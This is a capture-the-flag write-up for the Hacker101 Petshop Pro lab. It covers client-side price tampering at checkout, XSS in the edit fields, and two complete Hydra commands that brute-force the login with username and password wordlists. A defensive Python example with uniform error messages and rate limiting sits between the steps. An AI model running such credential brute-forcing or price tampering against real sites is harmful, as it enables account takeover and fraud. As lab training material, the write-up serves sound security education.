Petshop Pro
Flag0
Reading the hint, we see that the vulnerability is on the checkout page. Add the kitten and the puppy to the cart and go to checkout, then inspect the page and change the value of the price to 0.
Flag1
Use fuzzing to find the entry point, then brute-force the credentials.
 
Well, it took me a lot of time to find the username with Turbo in Burp Suite. We can also use Hydra to crack it.
hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -p 'asd' f1230b94c6dbbc207a455a3c6414a0fb.ctf.hacker101.com https-post-form "/login:username=^USER^&password=^PASS^:F=Invalid username" -t 64 -f
We have the username; now we look for the password:
hydra -l [username] -P rockyou.txt f1230b94c6dbbc207a455a3c6414a0fb.ctf.hacker101.com https-post-form "/login:username=^USER^&password=^PASS^:F=Invalid password" -t 64 -f
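The two Hydra runs work because the login form answers "Invalid username" and "Invalid password" separately, and because nothing limits the request rate. The following is an added example (not part of the original write-up or of the challenge's code) of a login check that closes both gaps; the class name, thresholds and messages are assumptions.

```python
import hashlib
import hmac
import os
import time

GENERIC_ERROR = "Invalid username or password"  # one message for both failure cases
MAX_FAILURES = 5        # assumed threshold per key
WINDOW_SECONDS = 300    # assumed sliding window


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class LoginService:
    def __init__(self, users: dict[str, str], clock=time.monotonic):
        self._clock = clock
        self._failures: dict[str, list[float]] = {}
        self._users = {}
        for name, pw in users.items():
            salt = os.urandom(16)
            self._users[name] = (salt, _hash(pw, salt))
        # Dummy record: unknown usernames cost the same hashing work as real ones.
        self._dummy = (os.urandom(16), os.urandom(32))

    def _throttled(self, key: str) -> bool:
        now = self._clock()
        recent = [t for t in self._failures.get(key, []) if now - t < WINDOW_SECONDS]
        self._failures[key] = recent  # drop failures that fell out of the window
        return len(recent) >= MAX_FAILURES

    def login(self, username: str, password: str, client_ip: str) -> tuple[int, str]:
        keys = (f"ip:{client_ip}", f"user:{username}")  # throttle per source and per name
        if any(self._throttled(k) for k in keys):
            return 429, "Too many attempts, try again later"
        salt, expected = self._users.get(username, self._dummy)
        ok = hmac.compare_digest(_hash(password, salt), expected)
        if ok and username in self._users:
            return 200, "OK"
        now = self._clock()
        for k in keys:  # count the failure whether or not the username exists
            self._failures.setdefault(k, []).append(now)
        return 401, GENERIC_ERROR


if __name__ == "__main__":
    svc = LoginService({"alice": "s3cret"})  # constructed sample account
    print(svc.login("nobody", "asd", "203.0.113.5"))  # unknown user
    print(svc.login("alice", "asd", "203.0.113.5"))   # wrong password, same answer
```

With a uniform response, the `F=Invalid username` failure string no longer separates valid from invalid names, and the throttle applies to unknown usernames too, so a 429 does not leak validity either.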
Flag2
We inject an XSS payload into the Name and Description fields on the Edit page, then go to checkout!
